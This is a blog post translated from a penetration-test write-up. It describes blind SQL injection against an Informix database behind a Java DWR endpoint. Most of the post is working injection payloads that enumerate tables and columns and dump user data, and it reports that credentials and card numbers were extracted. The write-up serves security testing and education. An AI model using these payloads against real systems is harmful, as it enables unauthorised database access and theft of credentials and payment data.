Informix数据库SQL注入实战


发布人:admin分类:网络安全浏览量:25发布时间:2017-12-12

在最近的应用程序渗透测试中,我发现一个有意思的sql漏洞(SQLI中)。

SQLI出现这种情况的原因:
1.开发中带来的问题
2.数据库正在使用

下面,我来介绍介绍我遇到的问题以及如何解决并dump数据库。该应用程序使用一种名为DWR后端的JAVA远程调用框架,系统调用是这样的:

这是位于C0-param1的参数,从表面上看起来很容易,因为它给了详细的错误信息,当一个单引号被添加到参数尾部时,会得到以下错误信息:“java.sql.SQLException: A syntax error has occurred.”(语法错误)

c0-param1参数控制有多少结果从数据库中检索出来,这注射点出现在类似于mssql的TOP keyword位置和MYSQL的Limit。我认为SQLI跑MSSQL库比MYSQL更合适。我添加一系列请求如下图所示:

执行查询后,得到一个错误信息:“java.sql.SQLException: The column (card_no) must be in the GROUP BY list.”数据库系统是IBM的Informix,我对Informix了解甚少,所以还得一个函数一个函数地查IBM的文档。
现在知道这是Informix,能帮助我们对次注射是怎么产生的,第一个子句,类似TOP和LIMIT,查询起来是这样的:

c0-param1=string:10 (CASE WHEN SUBSTR((SELECT USER FROM SYSTABLES WHERE TABID = 1), 1, 1) = 'a' THEN 1 ELSE (SELECT 1 FROM SYSTABLES) END),

如果条件为真(即当前用户名的第一个字母为'a'),查询将返回结果,反则会报错,因为子查询(SELECT 1 FROM SYSTABLES)会返回多个结果。然而,又有难题了,不能使用等号,通过替换,使用以下语句:

c0-param1=string:10 (CASE WHEN SUBSTR((SELECT USER FROM SYSTABLES WHERE TABID > 0 AND TABID < 2), 1, 1) LIKE &#039;a&#039; THEN 1 ELSE (SELECT 1 FROM SYSTABLES) END),

有了这些注射知识和概念就好整多了,掏出sqlmap(从我的同事那里弄到了些小技巧,而且观摩了他的帖子“Sqlmap的高级注入技巧”),Sqlmap的确是很好的工具,作者是今年在大会上认识的一个很不错的家伙写的。。。好像跑题了。不过遗憾的是,Sqlmap不支持Informix,所以我不得不自己写工具了:

获取表名的长度:

c0-param1=string:10 (CASE WHEN CHAR_LENGTH((SELECT TABNAME FROM SYSTABLES WHERE TABID > 0 AND TABID < 2)) > 1 THEN 1 ELSE (SELECT 1 FROM SYSTABLES) END),

获取表名:

c0-param1=string:10 (CASE WHEN SUBSTR((SELECT TABNAME FROM SYSTABLES WHERE TABID > 0 AND TABID < 2), 1, 1) LIKE &#039;a&#039; THEN 1 ELSE (SELECT 1 FROM SYSTABLES) END),

获取有表中有多少列:

c0-param1=string:10 (CASE WHEN (SELECT NCOLS FROM SYSTABLES WHERE TABID > 0 AND TABID < 2) > 1 THEN 1 ELSE (SELECT 1 FROM SYSTABLES) END),

获取列名长度:

c0-param1=string:10 (CASE WHEN CHAR_LENGTH((SELECT COLNAME FROM SYSCOLUMNS WHERE (TABID > 0 AND TABID < 2) AND (COLNO > 0 AND COLNO < 2))) > 1 THEN 1 ELSE (SELECT 1 FROM SYSTABLES) END),

获取列名:

c0-param1=string:10 (CASE WHEN SUBSTR((SELECT COLNAME FROM SYSCOLUMNS WHERE (TABID > 0 AND TABID < 2) AND (COLNO > 0 AND COLNO < 2)), 1, 1) LIKE &#039;a&#039; THEN 1 ELSE (SELECT 1 FROM SYSTABLES) END),

通过一个小研究,我发现Informix的表实际上有一个隐藏很深的列名:ROWID,每一行都存在一个这样的序列号。然而,这些ROWID可以分散,删除或插入到表。为了找到包含数据的ROWID,我调用一个名为NVL的函数,这个函数可以返回不同的结果,具体取决于第一个参数是否为NULL。最终找到一处可能总是包含数据的一列,语句:

c0-param1=string:10 (NVL((SELECT username FROM users WHERE ROWID > 0 AND ROWID < 2), (SELECT 1 FROM SYSTABLES))),
c0-param1=string:10 (CASE WHEN SUBSTR((SELECT username FROM users WHERE ROWID > 0 AND ROWID < 1), 1, 1) LIKE &#039;a&#039; THEN 1 ELSE (SELECT 1 FROM SYSTABLES) END),

通过这种方法,能够发现纯文本应用程序凭据,明文银行SFTP凭证和未加密的支付卡号码。
随着这一成功,明白了以前对Informix数据库想知道的。

[via spiderlabs 编译by Rem1x]


被黑站点统计 - 文章版权1、本主题所有言论和图片纯属会员个人意见,与本文章立场无关
2、本站所有主题由该文章作者发表,该文章作者与被黑站点统计享有文章相关版权
3、其他单位或个人使用、转载或引用本文时必须同时征得该文章作者和被黑站点统计的同意
4、文章作者须承担一切因本文发表而直接或间接导致的民事或刑事法律责任
5、本帖部分内容转载自其它媒体,但并不代表本站赞同其观点和对其真实性负责
6、如本帖侵犯到任何版权问题,请立即告知本站,本站将及时予与删除并致以最深的歉意
7、被黑站点统计管理员有权不事先通知发贴者而删除本文

免责声明

本站主要通过网络搜集国内被黑网站信息,统计分析数据,为部署安全型网络提供强有力的依据.本站所有工作人员均不参与黑站,挂马或赢利性行为,所有数据均为网民提供,提交者不一定是黑站人,所有提交采取不记名,先提交先审核的方式,如有任何疑问请及时与我们联系.

admin  的文章


微信公众号

微信公众号


Copyright © 2012-2022被黑网站统计系统All Rights Reserved
页面总访问量:21208901(PV) 页面执行时间:95.384(MS)
  • xml
  • 网站地图